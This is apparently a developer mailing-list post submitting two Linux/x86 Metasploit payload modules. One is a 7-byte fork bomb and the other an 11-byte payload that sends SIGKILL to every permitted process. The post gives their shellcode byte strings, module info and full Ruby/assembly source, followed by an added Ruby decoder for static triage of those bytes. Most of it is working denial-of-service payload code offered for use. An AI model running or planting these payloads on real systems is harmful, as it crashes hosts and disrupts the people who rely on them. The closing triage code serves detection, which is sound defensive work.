Hey guys,

I just started playing around with Metasm earlier today (it's great!), and drew up a couple of simple Linux/x86 payloads to test some of it out a bit. I don't think these are really of interest for inclusion, but you're of course welcome to them if they are. I figure sending them can't hurt anything.

The first is a fork bomb in 7 bytes, and the other is kill(-1,9) in 11 bytes. These are some things I did when I first started playing with shellcode:

http://www.milw0rm.com/shellcode/2805
http://www.milw0rm.com/shellcode/3446

And as you can see they're the same:

$ ./msfpayload linux/x86/forkbomb y
# linux/x86/forkbomb - 7 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x02\x58\xcd\x80\xeb\xf9"

$ ./msfpayload linux/x86/killall y
# linux/x86/killall - 11 bytes
# http://www.metasploit.com
# AppendExit=false, PrependSetresuid=false,
# PrependSetuid=false, PrependSetreuid=false
"\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80"

Quite cool.

msf > info linux/x86/forkbomb

       Name: Linux Fork Bomb (Metasm)
    Version: 1
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 40

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Description:
  This payload launches a fork bomb, i.e. 'for (;;) fork()'

msf > info linux/x86/killall

       Name: Linux Kill All Processes (Metasm)
    Version: 1
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 44

Provided by:
  Kris Katterjohn <[EMAIL PROTECTED]>

Description:
  This payload sends SIGKILL to all of the processes we are permitted
  to send to via kill(-1, 9)

Thanks,
Kris Katterjohn

require 'msf/core'
require 'metasm'

module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Linux

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linux Fork Bomb (Metasm)',
      'Version'     => '1',
      'Description' => %q{
        This payload launches a fork bomb, i.e. 'for (;;) fork()'
      },
      'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X86,
      'Payload'     =>
        {
          'Offsets'  => {},
          'Assembly' => <<EOA
; http://milw0rm.com/shellcode/2805
_start:
  ; eax = 2, the fork system call number on Linux/x86
  push 2
  pop eax
  int 0x80
  ; loop back to _start
  jmp _start
EOA
        }
    ))
  end
end

require 'msf/core'
require 'metasm'

module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Linux

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linux Kill All Processes (Metasm)',
      'Version'     => '1',
      'Description' => %q{
        This payload sends SIGKILL to all of the processes we are permitted
        to send to via kill(-1, 9)
      },
      'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X86,
      'Payload'     =>
        {
          'Offsets'  => {},
          'Assembly' => <<EOA
; http://milw0rm.com/shellcode/3446
  ; eax = 37, the kill system call number on Linux/x86
  push 37
  pop eax
  ; ebx = -1, the pid argument
  push -1
  pop ebx
  ; ecx = 9, SIGKILL
  push 9
  pop ecx
  int 0x80
EOA
        }
    ))
  end
end
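
For static triage, the two byte strings from the msfpayload output can be decoded back to the system calls the modules' assembly describes. This is an added example, not code from the original post or from Metasploit; the names triage, s8, REGS and SYSCALLS are made up for it, and it handles only the four opcodes those two strings use (it does not model eax being overwritten by the system call's return value).

```ruby
# Added example (not from the original post): linear decoder for the small
# opcode set the two quoted payload strings use.
REGS = %w[eax ecx edx ebx esp ebp esi edi].freeze
SYSCALLS = { 2 => 'fork', 37 => 'kill' }.freeze # Linux/x86 numbers named in the post

# Byte strings exactly as quoted in the msfpayload output in the post.
FORKBOMB = "\x6a\x02\x58\xcd\x80\xeb\xf9".b
KILLALL  = "\x6a\x25\x58\x6a\xff\x5b\x6a\x09\x59\xcd\x80".b

# Sign-extend an 8-bit immediate.
def s8(byte)
  byte > 127 ? byte - 256 : byte
end

# Returns one hash per int 0x80 and per backward jmp found in +blob+.
def triage(blob)
  code = blob.bytes
  stack = []
  regs = {}
  findings = []
  pc = 0
  while pc < code.length
    op = code[pc]
    if (0x58..0x5f).cover?(op) # pop r32: move the tracked stack value into a register
      regs[REGS[op - 0x58]] = stack.pop
      pc += 1
      next
    end
    imm = code[pc + 1] or raise ArgumentError, "truncated at offset #{pc}"
    case op
    when 0x6a # push imm8 (sign-extended)
      stack.push(s8(imm))
    when 0xcd # int imm8: only 0x80 is a Linux system call
      if imm == 0x80
        nr = regs['eax']
        findings << { offset: pc, syscall: SYSCALLS.fetch(nr, "sys_#{nr}"),
                      ebx: regs['ebx'], ecx: regs['ecx'] }
      end
    when 0xeb # jmp rel8: a backward target means a loop
      target = pc + 2 + s8(imm)
      findings << { offset: pc, loop_to: target } if target <= pc
    else
      raise ArgumentError, format('unsupported opcode 0x%02x at offset %d', op, pc)
    end
    pc += 2
  end
  findings
end

[FORKBOMB, KILLALL].each { |blob| p triage(blob) } if $PROGRAM_NAME == __FILE__
```

A fork call followed by a backward jump to offset 0, or a kill call with ebx = -1 and ecx = 9, is the pattern to flag when such bytes turn up in a sample.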